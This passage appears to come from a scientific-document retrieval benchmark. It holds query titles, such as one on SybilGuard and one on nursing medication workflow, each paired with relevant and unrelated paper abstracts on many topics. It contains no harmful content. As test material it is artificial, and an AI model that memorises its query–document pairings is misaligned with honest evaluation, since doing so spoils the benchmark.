"text": "Experts in sport benefit from some cognitive mechanisms and strategies which enables them to reduce response times and increase response accuracy.Reaction time is mediated by different factors including type of sport that athlete is participating in and expertise status. The present study aimed to investigate the relationship between CRTs and expertise level in collegiate athletes, as well as evaluating the role of sport and gender differences.44 male and female athletesrecruited from team and individual sports at elite and non-elite levels. The Lafayette multi-choice reaction time was used to collect data.All subjectsperformed a choice reaction time task that required response to visual and auditory stimuli. Results demonstrated a significant overall choice reaction time advantage for maleathletes, as well as faster responses to stimuli in elite participants.Athletes of team sportsdid not showmore accurate performance on the choice reaction time tasks than athletes of individual sports. These findings suggest that there is a relation between choice reaction time and expertise in athletes and this relationship can be mediated by gender differences. Overall, athletes with intrinsic perceptualmotor advantages such as faster reaction times are potentially more equipped for participation in high levels of sport.",
"title": ""
},
{
"docid": "147052ca81630c605c43c7cfb55ada26",
"text": "We conducted a user study evaluating two preference elicitation approaches based on ratings and personality quizzes respectively. Three criteria were used in this comparative study: perceived accuracy, user effort and user loyalty. Results from our study show that the perceived accuracy in two systems is not significantly different. However, users expended significantly less effort, both perceived cognitive effort and actual task time, to complete the preference profile establishing process in the personality quiz-based system than in the rating-based system. Additionally, users expressed stronger intention to reuse the personality quiz-based system and introduce it to their friends. After using these two systems, 53% of users preferred the personality quiz-based system vs. 13% of users preferred the rating-based system, since most users thought the former is easier to use.",
"title": ""
},
{
"docid": "1a528eb041dac4ab8bf4155e2eb6050a",
"text": "A novel boosted MOS structure with buried n-well current booster providing >2× higher drive current and low off current is experimentally demonstrated on 28 nm bulk silicon technology. TCAD analysis is performed to investigate the boosting mechanism as well as to demonstrate scalability to 7 nm FinFET technology. Constant bias applied to the booster terminal results in a gate voltage controlled body current source intrinsic vertical BJT that only turns on at high gate voltage. The body current then amplifies lateral BJT current. The inherent vertical and lateral BJTs are automatically turned off at low gate voltage, maintaining low off-state current.",
"title": ""
},
{
"docid": "56a3a761606e699c3f21fb0fe1ecbf0a",
"text": "Internet banking (IB) has become one of the widely used banking services among Malaysian retail banking customers in recent years. Despite its attractiveness, customer loyalty towards Internet banking website has become an issue due to stiff competition among the banks in Malaysia. As the development and validation of a customer loyalty model in Internet banking website context in Malaysia had not been addressed by past studies, this study attempts to develop a model based on the usage of Information System (IS), with the purpose to investigate factors influencing customer loyalty towards Internet banking websites. A questionnaire survey was conducted with the sample consisting of Internet banking users in Malaysia. Factors that influence customer loyalty towards Internet banking website in Malaysia have been investigated and tested. The study also attempts to identify the most essential factors among those investigated: service quality, perceived value, trust, habit and reputation of the bank. Based on the findings, trust, habit and reputation are found to have a significant influence on customer loyalty towards individual Internet banking websites in Malaysia. As compared to trust or habit factors, reputation is the strongest influence. The results also indicated that service quality and perceived value are not significantly related to customer loyalty. Service quality is found to be an important factor in influencing the adoption of the technology, but did not have a significant influence in retention of customers. The findings have provided an insight to the internet banking providers on the areas to be focused on in retaining their customers.",
"title": ""
},
{
"docid": "7ffaedeabffcc9816d1eb83a4e4cdfd0",
"text": "In this paper, we propose a new method for calculating the output layer in neural machine translation systems. The method is based on predicting a binary code for each word and can reduce computation time/memory requirements of the output layer to be logarithmic in vocabulary size in the best case. In addition, we also introduce two advanced approaches to improve the robustness of the proposed model: using error-correcting codes and combining softmax and binary codes. Experiments on two English ↔ Japanese bidirectional translation tasks show proposed models achieve BLEU scores that approach the softmax, while reducing memory usage to the order of less than 1/10 and improving decoding speed on CPUs by x5 to x10.",
"title": ""
},
{
"docid": "755f7d663e813d7450089fc0d7058037",
"text": "This paper presents a new approach for learning in structured domains (SDs) using a constructive neural network for graphs (NN4G). The new model allows the extension of the input domain for supervised neural networks to a general class of graphs including both acyclic/cyclic, directed/undirected labeled graphs. In particular, the model can realize adaptive contextual transductions, learning the mapping from graphs for both classification and regression tasks. In contrast to previous neural networks for structures that had a recursive dynamics, NN4G is based on a constructive feedforward architecture with state variables that uses neurons with no feedback connections. The neurons are applied to the input graphs by a general traversal process that relaxes the constraints of previous approaches derived by the causality assumption over hierarchical input data. Moreover, the incremental approach eliminates the need to introduce cyclic dependencies in the definition of the system state variables. In the traversal process, the NN4G units exploit (local) contextual information of the graphs vertices. In spite of the simplicity of the approach, we show that, through the compositionality of the contextual information developed by the learning, the model can deal with contextual information that is incrementally extended according to the graphs topology. The effectiveness and the generality of the new approach are investigated by analyzing its theoretical properties and providing experimental results.",
"title": ""
},
{
"docid": "a424b935e6165a71b5f17d9a61350f75",
"text": "Understanding how biological visual systems recognize objects is one of the ultimate goals in computational neuroscience. From the computational viewpoint of learning, different recognition tasks, such as categorization and identification, are similar, representing different trade-offs between specificity and invariance. Thus, the different tasks do not require different classes of models. We briefly review some recent trends in computational vision and then focus on feedforward, view-based models that are supported by psychophysical and physiological data.",
"title": ""
},
{
"docid": "dea52c761a9f4d174e9bd410f3f0fa38",
"text": "Much computational work has been done on identifying and interpreting the meaning of metaphors, but little work has been done on understanding the motivation behind the use of metaphor. To computationally model discourse and social positioning in metaphor, we need a corpus annotated with metaphors relevant to speaker intentions. This paper reports a corpus study as a first step towards computational work on social and discourse functions of metaphor. We use Amazon Mechanical Turk (MTurk) to annotate data from three web discussion forums covering distinct domains. We then compare these to annotations from our own annotation scheme which distinguish levels of metaphor with the labels: nonliteral, conventionalized, and literal. Our hope is that this work raises questions about what new work needs to be done in order to address the question of how metaphors are used to achieve social goals in interaction.",
"title": ""
},
{
"docid": "63a6fc3be6322d5020e71140a88bc1cf",
"text": "We present a new architecture for named entity recognition. Our model employs multiple independent bidirectional LSTM units across the same input and promotes diversity among them by employing an inter-model regularization term. By distributing computation across multiple smaller LSTMs we find a reduction in the total number of parameters. We find our architecture achieves state-of-the-art performance on the CoNLL 2003 NER dataset.",
"title": ""
},
{
"docid": "eda6795cb79e912a7818d9970e8ca165",
"text": "This study aimed to examine the relationship between maximum leg extension strength and sprinting performance in youth elite male soccer players. Sixty-three youth players (12.5 ± 1.3 years) performed 5 m, flying 15 m and 20 m sprint tests and a zigzag agility test on a grass field using timing gates. Two days later, subjects performed a one-repetition maximum leg extension test (79.3 ± 26.9 kg). Weak to strong correlations were found between leg extension strength and the time to perform 5 m (r = -0.39, p = 0.001), flying 15 m (r = -0.72, p < 0.001) and 20 m (r = -0.67, p < 0.001) sprints; between body mass and 5 m (r = -0.43, p < 0.001), flying 15 m (r = -0.75, p < 0.001), 20 m (r = -0.65, p < 0.001) sprints and agility (r =-0.29, p < 0.001); and between height and 5 m (r = -0.33, p < 0.01) and flying 15 m (r = -0.74, p < 0.001) sprints. Our results show that leg muscle strength and anthropometric variables strongly correlate with sprinting ability. This suggests that anthropometric characteristics should be considered to compare among youth players, and that youth players should undergo strength training to improve running speed.",
"title": ""
},
{
"docid": "732edb7fe28fa894fd186c5512e8cb8d",
"text": "In knowledge management literature it is often pointed out that it is important to distinguish between data, information and knowledge. The generally accepted view sees data as simple facts that become information as data is combined into meaningful structures, which subsequently become knowledge as meaningful information is put into a context and when it can be used to make predictions. This view sees data as a prerequisite for information, and information as a prerequisite for knowledge. In this paper, I will explore the conceptual hierarchy of data, information and knowledge, showing that data emerges only after we have information, and that information emerges only after we already have knowledge. The reversed hierarchy of knowledge is shown to lead to a different approach in developing information systems that support knowledge management and organizational memory. It is also argued that this difference may have major implications for organizational flexibility and renewal.",
"title": ""
},
{
"docid": "9ddca15b5f6cc4e13a55b1d4360c03b4",
"text": "The substantial growth in online social networks has vastly expanded the potential impact of electronic word of mouth (eWOM) on consumer purchasing decisions. A critical literature review exposed that there is limited research on the impact of online consumer reviews on online purchasing decisions of Saudi Arabian consumers. This research reports on results of a study on the effects of online reviews on Saudi citizens' online purchasing decisions. The results show that Saudi Internet shoppers are very much influenced by eWOM, and that a larger percentage of them are dependent on such online forums when making decisions to purchase products through the Internet.",
"title": ""
},
{
"docid": "c625e9d1bb6cdb54864ab10ae2b0e060",
"text": "This special issue of the proceedings of the IEEE presents a systematical and complete tutorial on digital television (DTV), produced by a team of DTV experts worldwide. This introductory paper puts the current DTV systems into perspective and explains the historical background and different evolution paths that each system took. The main focus is on terrestrial DTV systems, but satellite and cable DTV are also covered,as well as several other emerging services.",
"title": ""
},
{
"docid": "b1a5c91ce404a95fea0bea45277b75e0",
"text": "Flocking behaviour in Multi-agent Systems (MAS) has attracted tremendous attention amongst researchers in the recent past due to its potential applications in various fields where distributed work environment is desired. The flocking algorithms have the potential to introduce self-organizing, self-healing and selfconfiguring capabilities in the functioning of a distributed system. The flocking algorithms exploit various artificial intelligence techniques, mathematical potential functions and geometric approaches to realize the global objectives by controlling local parameters. The main parameters of characterization of any flocking algorithm consist of mathematical models of agents, their hierarchical or flat control structures and the control approach by which these agents are controlled to exhibit flocking behaviour along with any type of formational constraints. A rigorous survey study of flocking algorithms for agents in MAS in the perspective of various instances of agents shows that there lies a huge scope for the researchers to apply, experiment and analyse various techniques locally to achieve global objectives. This paper surveys the flocking algorithms in perspective of these parameters.",
"title": ""
},
{
"docid": "cbf856284155b7ad6a48ca2fdc758df2",
"text": "We present an image caption system that addresses new challenges of automatically describing images in the wild. The challenges include generating high quality caption with respect to human judgments, out-of-domain data handling, and low latency required in many applications. Built on top of a state-of-the-art framework, we developed a deep vision model that detects a broad range of visual concepts, an entity recognition model that identifies celebrities and landmarks, and a confidence model for the caption output. Experimental results show that our caption engine outperforms previous state-of-the-art systems significantly on both in-domain dataset (i.e. MS COCO) and out-of-domain datasets. We also make the system publicly accessible as a part of the Microsoft Cognitive Services.",
"title": ""
},
{
"docid": "85b77b88c2a06603267b770dbad8ec73",
"text": "Many errors in coreference resolution come from semantic mismatches due to inadequate world knowledge. Errors in named-entity linking (NEL), on the other hand, are often caused by superficial modeling of entity context. This paper demonstrates that these two tasks are complementary. We introduce NECO, a new model for named entity linking and coreference resolution, which solves both problems jointly, reducing the errors made on each. NECO extends the Stanford deterministic coreference system by automatically linking mentions to Wikipedia and introducing new NEL-informed mention-merging sieves. Linking improves mention-detection and enables new semantic attributes to be incorporated from Freebase, while coreference provides better context modeling by propagating named-entity links within mention clusters. Experiments show consistent improvements across a number of datasets and experimental conditions, including over 11% reduction in MUC coreference error and nearly 21% reduction in F1 NEL error on ACE 2004 newswire data.",
"title": ""
}
] | scidocsrr |
edf9c1e2247da5cf7f333e3cf35cde1c | SybilGuard: Defending Against Sybil Attacks via Social Networks | [
{
"docid": "6c3f320eda59626bedb2aad4e527c196",
"text": "Though research on the Semantic Web has progressed at a steady pace, its promise has yet to be realized. One major difficulty is that, by its very nature, the Semantic Web is a large, uncensored system to which anyone may contribute. This raises the question of how much credence to give each source. We cannot expect each user to know the trustworthiness of each source, nor would we want to assign top-down or global credibility values due to the subjective nature of trust. We tackle this problem by employing a web of trust, in which each user provides personal trust values for a small number of other users. We compose these trusts to compute the trust a user should place in any other user in the network. A user is not assigned a single trust rank. Instead, different users may have different trust values for the same user. We define properties for combination functions which merge such trusts, and define a class of functions for which merging may be done locally while maintaining these properties. We give examples of specific functions and apply them to data from Epinions and our BibServ bibliography server. Experiments confirm that the methods are robust to noise, and do not put unreasonable expectations on users. We hope that these methods will help move the Semantic Web closer to fulfilling its promise.",
"title": ""
}
] | [
{
"docid": "2b3939e2bc0b0a6bf95a3b97bfda8da6",
"text": "We generalise Spatial Transformer Networks (STN) by replacing the parametric transformation of a fixed, regular sampling grid with a deformable, statistical shape model which is itself learnt. We call this a Statistical Transformer Network (StaTN). By training a network containing a StaTN end-to-end for a particular task, the network learns the optimal nonrigid alignment of the input data for the task. Moreover, the statistical shape model is learnt with no direct supervision (such as landmarks) and can be reused for other tasks. Besides training for a specific task, we also show that a StaTN can learn a shape model using generic loss functions. This includes a loss inspired by the minimum description length principle in which an appearance model is also learnt from scratch. In this configuration, our model learns an active appearance model and a means to fit the model from scratch with no supervision at all, even identity labels.",
"title": ""
},
{
"docid": "ac2a980bb528c6747062195017f155c0",
"text": "Dimension reduction is commonly defined as the process of mapping high-dimensional data to a lower-dimensional embedding. Applications of dimension reduction include, but are not limited to, filtering, compression, regression, classification, feature analysis, and visualization. We review methods that compute a point-based visual representation of high-dimensional data sets to aid in exploratory data analysis. The aim is not to be exhaustive but to provide an overview of basic approaches, as well as to review select state-of-the-art methods. Our survey paper is an introduction to dimension reduction from a visualization point of view. Subsequently, a comparison of state-of-the-art methods outlines relations and shared research foci. 1998 ACM Subject Classification G.3 Multivariate Statistics; I.2.6 Learning; G.1.2 Approximation",
"title": ""
},
{
"docid": "1bf69a2bffe2652e11ff8ec7f61b7c0d",
"text": "This research proposes and validates a design theory for digital platforms that support online communities (DPsOC). It addresses ways in which digital platforms can effectively support social interactions in online communities. Drawing upon prior literature on IS design theory, online communities, and platforms, we derive an initial set of propositions for designing effective DPsOC. Our overarching proposition is that three components of digital platform architecture (core, interface, and complements) should collectively support the mix of the three distinct types of social interaction structures of online community (information sharing, collaboration, and collective action). We validate the initial propositions and generate additional insights by conducting an in-depth analysis of an European digital platform for elderly care assistance. We further validate the propositions by analyzing three widely used digital platforms, including Twitter, Wikipedia, and Liquidfeedback, and we derive additional propositions and insights that can guide DPsOC design. We discuss the implications of this research for research and practice. Journal of Information Technology advance online publication, 10 February 2015; doi:10.1057/jit.2014.37",
"title": ""
},
{
"docid": "2493570aa0a224722a07e81c9aab55cd",
"text": "A Smart Tailor Platform is proposed as a venue to integrate various players in garment industry, such as tailors, designers, customers, and other relevant stakeholders to automate its business processes. In, Malaysia, currently the processes are conducted manually which consume too much time in fulfilling its supply and demand for the industry. To facilitate this process, a study was conducted to understand the main components of the business operation. The components will be represented using a strategic management tool namely the Business Model Canvas (BMC). The inception phase of the Rational Unified Process (RUP) was employed to construct the BMC. The phase began by determining the basic idea and structure of the business process. The information gathered was classified into nine related dimensions and documented in accordance with the BMC. The generated BMC depicts the relationship of all the nine dimensions for the garment industry, and thus represents an integrated business model of smart tailor. This smart platform allows the players in the industry to promote, manage and fulfill supply and demands of their product electronically. In addition, the BMC can be used to assist developers in designing and developing the smart tailor platform.",
"title": ""
},
{
"docid": "deaed3405c242023f6c52a777f25ba88",
"text": "Adipose tissue is a complex, essential, and highly active metabolic and endocrine organ. Besides adipocytes, adipose tissue contains connective tissue matrix, nerve tissue, stromovascular cells, and immune cells. Together these components function as an integrated unit. Adipose tissue not only responds to afferent signals from traditional hormone systems and the central nervous system but also expresses and secretes factors with important endocrine functions. These factors include leptin, other cytokines, adiponectin, complement components, plasminogen activator inhibitor-1, proteins of the renin-angiotensin system, and resistin. Adipose tissue is also a major site for metabolism of sex steroids and glucocorticoids. The important endocrine function of adipose tissue is emphasized by the adverse metabolic consequences of both adipose tissue excess and deficiency. A better understanding of the endocrine function of adipose tissue will likely lead to more rational therapy for these increasingly prevalent disorders. This review presents an overview of the endocrine functions of adipose tissue.",
"title": ""
},
{
"docid": "ebec0e9391eff2201caec18a32807753",
"text": "We study a theoretical model that connects deep learning to finding the ground state of the Hamiltonian of a spherical spin glass. Existing results motivated from statistical physics show that deep networks have a highly non-convex energy landscape with exponentially many local minima and energy barriers beyond which gradient descent algorithms cannot make progress. We leverage a technique known as topology trivialization where, upon perturbation by an external magnetic field, the energy landscape of the spin glass Hamiltonian changes dramatically from exponentially many local minima to “total trivialization”, i.e., a constant number of local minima. There also exists a transitional regime with polynomially many local minima which interpolates between these extremes. We show that a number of regularization schemes in deep learning can benefit from this phenomenon. As a consequence, our analysis provides order heuristics to choose regularization parameters and motivates annealing schemes for these perturbations.",
"title": ""
},
{
"docid": "dbdc0a429784aa085c571b7c01e3399f",
"text": "A large number of deaths are caused by Traffic accidents worldwide. The global crisis of road safety can be seen by observing the significant number of deaths and injuries that are caused by road traffic accidents. In many situations the family members or emergency services are not informed in time. This results in delayed emergency service response time, which can lead to an individual’s death or cause severe injury. The purpose of this work is to reduce the response time of emergency services in situations like traffic accidents or other emergencies such as fire, theft/robberies and medical emergencies. By utilizing onboard sensors of a smartphone to detect vehicular accidents and report it to the nearest emergency responder available and provide real time location tracking for responders and emergency victims, will drastically increase the chances of survival for emergency victims, and also help save emergency services time and resources. Keywords—Traffic accidents; accident detection; on-board sensor; accelerometer; android smartphones; real-time tracking; emergency services; emergency responder; emergency victim; SOSafe; SOSafe Go; firebase",
"title": ""
},
{
"docid": "fdab4af34adebd0d682134f3cf13d794",
"text": "Threat evaluation (TE) is a process used to assess the threat values (TVs) of air-breathing threats (ABTs), such as air fighters, that are approaching defended assets (DAs). This study proposes an automatic method for conducting TE using radar information when ABTs infiltrate into territory where DAs are located. The method consists of target asset (TA) prediction and TE. We divide a friendly territory into discrete cells based on the effective range of anti-aircraft missiles. The TA prediction identifies the TA of each ABT by predicting the ABT’s movement through cells in the territory via a Markov chain, and the cell transition is modeled by neural networks. We calculate the TVs of the ABTs based on the TA prediction results. A simulation-based experiment revealed that the proposed method outperformed TE based on the closest point of approach or the radial speed vector methods. © 2016 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "501b53d23ed15b5552eaaeec27520951",
"text": "Similarity join is the problem of finding pairs of records with similarity score greater than some threshold. In this paper we study the problem of scaling up similarity join for different metric distance functions using MapReduce. We propose a ClusterJoin framework that partitions the data space based on the underlying data distribution, and distributes each record to partitions in which they may produce join results based on the distance threshold. We design a set of strong candidate filters specific to different distance functions using a novel bisector-based framework, so that each record only needs to be distributed to a small number of partitions while still guaranteeing correctness. To address data skewness, which is common for high dimensional data, we further develop a dynamic load balancing scheme using sampling, which provides strong probabilistic guarantees on the size of partitions, and greatly improves scalability. Experimental evaluation using real data sets shows that our approach is considerably more scalable compared to state-ofthe-art algorithms, especially for high dimensional data with low distance thresholds.",
"title": ""
},
{
"docid": "434e3993775d1147c962e04f2706e3a1",
"text": "The aim of mining and analysis of Apps in Google Play, the largest Android app store, is to provide in-depth insight on the hidden properties of the repository to app developers or app market contributors. This approach can help them to view the current circumstances of the market and make valuable decisions before releasing products. To perform this analysis, all available features (descriptions of the app, app developer information, app version, updating date, category, number of download, app size, user rating, number of participants in rating, price, user reviews and security policies) are collected for the repository and stored in structured profile for each app. This scientific study is mainly divided into two approaches: measuring pair-wise correlations between extracted features and clustering the dataset into number of groups with functionally similar apps. Two distinct datasets are exploited to perform the study, one of which is collected from Google Play (in 2012) and another one from Android Market, the former version of Google Play (in 2011). As soon as experiments and analysis is successfully conducted, significant levels of pair-wise correlations are identified between some features for both datasets, which are further compared to achieve a generalized conclusion. Finally, cluster analysis is done to provide a similarity based recommendation system through probabilistic topic modeling method that can resolve Google Play’s deficiency upon app similarity.",
"title": ""
},
{
"docid": "3e0d7fb26382b9151f50ef18dc40b97a",
"text": "A. Redish et al. (2007) proposed a reinforcement learning model of context-dependent learning and extinction in conditioning experiments, using the idea of \"state classification\" to categorize new observations into states. In the current article, the authors propose an interpretation of this idea in terms of normative statistical inference. They focus on renewal and latent inhibition, 2 conditioning paradigms in which contextual manipulations have been studied extensively, and show that online Bayesian inference within a model that assumes an unbounded number of latent causes can characterize a diverse set of behavioral results from such manipulations, some of which pose problems for the model of Redish et al. Moreover, in both paradigms, context dependence is absent in younger animals, or if hippocampal lesions are made prior to training. The authors suggest an explanation in terms of a restricted capacity to infer new causes.",
"title": ""
},
{
"docid": "283285c4cbef271ac2d43e835f8a0b5c",
"text": "Cooperative behavior is a desired trait in many fields from computer games to robotics. Yet, achieving cooperative behavior is often difficult, as maintaining shared information about the dynamics of agents in the world can be complex. We focus on the specific task of cooperative pathfinding and introduce a new approach based on the idea of “direction maps” that learns about the movement of agents in the world. This learned data then is used to produce implicit cooperation between agents. This approach is less expensive and has better performance than several existing cooperative algorithms.",
"title": ""
},
{
"docid": "e3b92d76bb139d0601c85416e8afaca4",
"text": "Conventional supervised object recognition methods have been investigated for many years. Despite their successes, there are still two suffering limitations: (1) various information of an object is represented by artificial features only derived from RGB images, (2) lots of manually labeled data is required by supervised learning. To address those limitations, we propose a new semi-supervised learning framework based on RGB and depth (RGB-D) images to improve object recognition. In particular, our framework has two modules: (1) RGB and depth images are represented by convolutional-recursive neural networks to construct high level features, respectively, (2) co-training is exploited to make full use of unlabeled RGB-D instances due to the existing two independent views. Experiments on the standard RGB-D object dataset demonstrate that our method can compete against with other state-of-the-art methods with only 20% labeled data.",
"title": ""
},
{
"docid": "17813a603f0c56c95c96f5b2e0229026",
"text": "Geographic ranges are estimated for brachiopod and bivalve species during the late Middle (mid-Givetian) to the middle Late (terminal Frasnian) Devonian to investigate range changes during the time leading up to and including the Late Devonian biodiversity crisis. Species ranges were predicted using GARP (Genetic Algorithm using Rule-set Prediction), a modeling program developed to predict fundamental niches of modern species. This method was applied to fossil species to examine changing ranges during a critical period of Earth’s history. Comparisons of GARP species distribution predictions with historical understanding of species occurrences indicate that GARP models predict accurately the presence of common species in some depositional settings. In addition, comparison of GARP distribution predictions with species-range reconstructions from geographic information systems (GIS) analysis suggests that GARP modeling has the potential to predict species ranges more completely and tailor ranges more specifically to environmental parameters than GIS methods alone. Thus, GARP modeling is a potentially useful tool for predicting fossil species ranges and can be used to address a wide array of palaeontological problems. The use of GARP models allows a statistical examination of the relationship of geographic range size with species survival during the Late Devonian. Large geographic range was statistically associated with species survivorship across the crisis interval for species examined in the linguiformis Zone but not for species modeled in the preceding Lower varcus or punctata zones. The enhanced survival benefit of having a large geographic range, therefore, appears to be restricted to the biodiversity crisis interval.",
"title": ""
},
{
"docid": "0be92a74f0ff384c66ef88dd323b3092",
"text": "When facing uncertainty, adaptive behavioral strategies demand that the brain performs probabilistic computations. In this probabilistic framework, the notion of certainty and confidence would appear to be closely related, so much so that it is tempting to conclude that these two concepts are one and the same. We argue that there are computational reasons to distinguish between these two concepts. Specifically, we propose that confidence should be defined as the probability that a decision or a proposition, overt or covert, is correct given the evidence, a critical quantity in complex sequential decisions. We suggest that the term certainty should be reserved to refer to the encoding of all other probability distributions over sensory and cognitive variables. We also discuss strategies for studying the neural codes for confidence and certainty and argue that clear definitions of neural codes are essential to understanding the relative contributions of various cortical areas to decision making.",
"title": ""
},
{
"docid": "93adb6d22531c0ec6335a7bec65f4039",
"text": "The term stroke-based rendering collectively describes techniques where images are generated from elements that are usually larger than a pixel. These techniques lend themselves well for rendering artistic styles such as stippling and hatching. This paper presents a novel approach for stroke-based rendering that exploits multi agent systems. RenderBots are individual agents each of which in general represents one stroke. They form a multi agent system and undergo a simulation to distribute themselves in the environment. The environment consists of a source image and possibly additional G-buffers. The final image is created when the simulation is finished by having each RenderBot execute its painting function. RenderBot classes differ in their physical behavior as well as their way of painting so that different styles can be created in a very flexible way.",
"title": ""
},
{
"docid": "2cd3e74031bdbfdae29ea961933b3cfe",
"text": "In this paper, a prototype automotive radar sensor is presented that is capable of generating simultaneously multiple transmit (TX) beams. The system is based on a four-channel 77-GHz frequency-modulated continuous-wave (FMCW) radar system. The number of beams, their radiated power, steering angle, and beam pattern can be changed adaptively. This is achieved by the utilization of orthogonal waveforms applied to different beams in combination with digital beamforming on the receive side. Key components are vector modulators in the TX path controlled by digital-to-analog converters. The performance of the system is shown in measurements focused on beam pattern, signal-to-noise ratio, and susceptibility in case of interfering targets at cross-range. Measurement results are discussed and compared to theory and simulations. Furthermore, crest factor minimization of the vector modulator's control signals is introduced and used to increase the achievable TX power, which will be also shown in measurements.",
"title": ""
},
{
"docid": "6be148b33b338193ffbde2683ddc8991",
"text": "Predicting stock exchange rates is receiving increasing attention and is a vital financial problem as it contributes to the development of effective strategies for stock exchange transactions. The forecasting of stock price movement in general is considered to be a thought-provoking and essential task for financial time series' exploration. In this paper, a Least Absolute Shrinkage and Selection Operator (LASSO) method based on a linear regression model is proposed as a novel method to predict financial market behavior. LASSO method is able to produce sparse solutions and performs very well when the numbers of features are less as compared to the number of observations. Experiments were performed with Goldman Sachs Group Inc. stock to determine the efficiency of the model. The results indicate that the proposed model outperforms the ridge linear regression model.",
"title": ""
},
{
"docid": "c460660e6ea1cc38f4864fe4696d3a07",
"text": "Background. The effective development of healthcare competencies poses great educational challenges. A possible approach to provide learning opportunities is the use of augmented reality (AR) where virtual learning experiences can be embedded in a real physical context. The aim of this study was to provide a comprehensive overview of the current state of the art in terms of user acceptance, the AR applications developed and the effect of AR on the development of competencies in healthcare. Methods. We conducted an integrative review. Integrative reviews are the broadest type of research review methods allowing for the inclusion of various research designs to more fully understand a phenomenon of concern. Our review included multi-disciplinary research publications in English reported until 2012. Results. 2529 research papers were found from ERIC, CINAHL, Medline, PubMed, Web of Science and Springer-link. Three qualitative, 20 quantitative and 2 mixed studies were included. Using a thematic analysis, we've described three aspects related to the research, technology and education. This study showed that AR was applied in a wide range of topics in healthcare education. Furthermore acceptance for AR as a learning technology was reported among the learners and its potential for improving different types of competencies. Discussion. AR is still considered as a novelty in the literature. Most of the studies reported early prototypes. Also the designed AR applications lacked an explicit pedagogical theoretical framework. Finally the learning strategies adopted were of the traditional style 'see one, do one and teach one' and do not integrate clinical competencies to ensure patients' safety.",
"title": ""
},
{
"docid": "fa16577051c16a7f8aeb3c4c206a3c60",
"text": "Visual question answering (VQA) is a recently proposed artificial intelligence task that requires a deep understanding of both images and texts. In deep learning, images are typically modeled through convolutional neural networks (CNNs) while texts are typically modeled through recurrent neural networks (RNNs). In this work, we perform a detailed analysis on the natural language questions in VQA, which raises a different need for text representations as compared to other natural language processing tasks. Based on the analysis, we propose to rely on CNNs for learning text representations. By exploring various properties of CNNs specialized for text data, we present our “CNN Inception + Gate” model for text feature extraction in VQA. The experimental results show that simply replacing RNNs with our CNN-based model improves question representations and thus the overall accuracy of VQA models. In addition, our model has much fewer parameters and the computation is much faster. We also prove that the text representation requirement in VQA is more complicated and comprehensive than that in conventional natural language processing tasks. Shallow models like the fastText model, which can obtain comparable results with deep learning models in simple tasks like text classification, have poor performances in VQA.",
"title": ""
}
] | scidocsrr |
60d2b9018208dd89a85c7e6c288d0234 | MEDICATION ADMINISTRATION AND THE COMPLEXITY OF NURSING WORKFLOW | [
{
"docid": "b6a045abb9881abafae097e29f866745",
"text": "AIMS AND OBJECTIVES\nUnderstanding the processes by which nurses administer medication is critical to the minimization of medication errors. This study investigates nurses' views on the factors contributing to medication errors in the hope of facilitating improvements to medication administration processes.\n\n\nDESIGN AND METHODS\nA focus group of nine Registered Nurses discussed medication errors with which they were familiar as a result of both their own experiences and of literature review. The group, along with other researchers, then developed a semi-structured questionnaire consisting of three parts: narrative description of the error, the nurse's background and contributing factors. After the contributing factors had been elicited and verified with eight categories and 34 conditions, additional Registered Nurses were invited to participate by recalling one of the most significant medication errors that they had experienced and identifying contributing factors from those listed on the questionnaire. Identities of the hospital, patient and participants involved in the study remain confidential.\n\n\nRESULTS\nOf the 72 female nurses who responded, 55 (76.4%) believed more than one factor contributed to medication errors. 'Personal neglect' (86.1%), 'heavy workload' (37.5%) and 'new staff' (37.5%) were the three main factors in the eight categories. 'Need to solve other problems while administering drugs,''advanced drug preparation without rechecking,' and 'new graduate' were the top three of the 34 conditions. Medical wards (36.1%) and intensive care units (33.3%) were the two most error-prone places. The errors common to the two were 'wrong dose' (36.1%) and 'wrong drug' (26.4%). Antibiotics (38.9%) were the most commonly misadministered drugs.\n\n\nCONCLUSIONS\nAlthough the majority of respondents considered nurse's personal neglect as the leading factor in medication errors, analysis indicated that additional factors involving the health care system, patients' conditions and doctors' prescriptions all contributed to administration errors.\n\n\nRELEVANCE TO CLINICAL PRACTICE\nIdentification of the main factors and conditions contributing to medication errors allows clinical nurses and administration systems to eliminate situations that promote errors and to incorporate changes that minimize them, creating a safer patient environment.",
"title": ""
}
] | [
{
"docid": "bf53216a95c20d5f41b7821b05418919",
"text": "Bowlby's attachment theory is a theory of psychopathology as well as a theory of normal development. It contains clear and specific propositions regarding the role of early experience in developmental psychopathology, the importance of ongoing context, and the nature of the developmental process underlying pathology. In particular, Bowlby argued that adaptation is always the joint product of developmental history and current circumstances (never either alone). Early experience does not cause later pathology in a linear way; yet, it has special significance due to the complex, systemic, transactional nature of development. Prior history is part of current context, playing a role in selection, engagement, and interpretation of subsequent experience and in the use of available environmental supports. Finally, except in very extreme cases, early anxious attachment is not viewed as psychopathology itself or as a direct cause of psychopathology but as an initiator of pathways probabilistically associated with later pathology.",
"title": ""
},
{
"docid": "cc28e571bab9747922008e0ddfebbea4",
"text": "Rumelhart and McClelland's chapter about learning the past tense created a degree of controversy extraordinary even in the adversarial culture of modern science. It also stimulated a vast amount of research that advanced the understanding of the past tense, inflectional morphology in English and other languages, the nature of linguistic representations, relations between language and other phenomena such as reading and object recognition, the properties of artificial neural networks, and other topics. We examine the impact of the Rumelhart and McClelland model with the benefit of 25 years of hindsight. It is not clear who \"won\" the debate. It is clear, however, that the core ideas that the model instantiated have been assimilated into many areas in the study of language, changing the focus of research from abstract characterizations of linguistic competence to an emphasis on the role of the statistical structure of language in acquisition and processing.",
"title": ""
},
{
"docid": "af47d1cc068467eaee7b6129682c9ee3",
"text": "Diffusion kurtosis imaging (DKI) is gaining rapid adoption in the medical imaging community due to its ability to measure the non-Gaussian property of water diffusion in biological tissues. Compared to traditional diffusion tensor imaging (DTI), DKI can provide additional details about the underlying microstructural characteristics of the neural tissues. It has shown promising results in studies on changes in gray matter and mild traumatic brain injury where DTI is often found to be inadequate. The DKI dataset, which has high-fidelity spatio-angular fields, is difficult to visualize. Glyph-based visualization techniques are commonly used for visualization of DTI datasets; however, due to the rapid changes in orientation, lighting, and occlusion, visually analyzing the much more higher fidelity DKI data is a challenge. In this paper, we provide a systematic way to manage, analyze, and visualize high-fidelity spatio-angular fields from DKI datasets, by using spherical harmonics lighting functions to facilitate insights into the brain microstructure.",
"title": ""
},
{
"docid": "48e48660a711f1cf2d4d7703368b73c9",
